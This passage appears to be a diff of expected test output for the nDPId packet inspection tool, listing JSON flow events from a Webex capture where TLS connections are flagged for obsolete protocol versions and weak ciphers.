{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570672215,"flow_last_seen":1444570672215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570672215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1444570672215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570672215,"pkt":"ABoRAAACABoRAAABCABFAAA8MYhAAEAGVYAKCAABQERpZ6HLAbsAQeF1AAAAAKACOQgEvgAAAgQFtAQCCAoATND9AAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1444570672219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoAjpAABAGtOJARGlnCggAAQG7ocv\/vh6KAEHhdlAS\/\/9YlwAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1444570672219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoMYlAAEAGVZMKCAABQERpZ6HLAbsAQeF2\/74ei1AQOQgfkAAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570674487,"flow_last_seen":1444570674487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570674487,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1444570674487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570674487,"pkt":"ABoRAAACABoRAAABCABFAAA8CB5AAEAGejQKCAABrfMAbtlxAbui3tn8AAAAAKACOQgsWAAAAgQFtAQCCAoATNHiAAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1444570674499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570674499,"pkt":"ABoRAAACABoRAAABCABFAAAoAklAABAGsB2t8wBuCggAAQG72XFdISYDot7Z\/VAS\/\/8cOwAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1444570674500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570674500,"pkt":"ABoRAAACABoRAAABCABFAAAoCB9AAEAGekcKCAABrfMAbtlxAbui3tn9XSEmBFAQOQjjMwAA"}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570675941,"flow_last_seen":1444570675941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570675941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1444570675941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570675941,"pkt":"ABoRAAACABoRAAABCABFAAA8SaRAAEAGwwMKCAABPm3lnsp5AbteGJvVAAAAAKACOQhIBAAAAgQFtAQCCAoATNJxAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1444570675945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570675945,"pkt":"ABoRAAACABoRAAABCABFAAAoAm5AABAGOk4+beWeCggAAQG7ynmh52QqXhib1lAS\/\/+1iAAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1444570675946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570675946,"pkt":"ABoRAAACABoRAAABCABFAAAoSaVAAEAGwxYKCAABPm3lnsp5AbteGJvWoedkK1AQOQh8gQAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570679512,"flow_last_seen":1444570679512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570679512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1444570679512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570679512,"pkt":"ABoRAAACABoRAAABCABFAAA8dLdAAEAGDZsKCAABrfMAbtl1Abugj6duAAAAAKACOQhfOgAAAgQFtAQCCAoATNPZAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1444570679516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAoAphAABAGr86t8wBuCggAAQG72XVfcFiRoI+nb1AS\/\/8cNwAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1444570679516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAodLhAAEAGDa4KCAABrfMAbtl1Abugj6dvX3BYklAQOQjjLwAA"}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01209{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 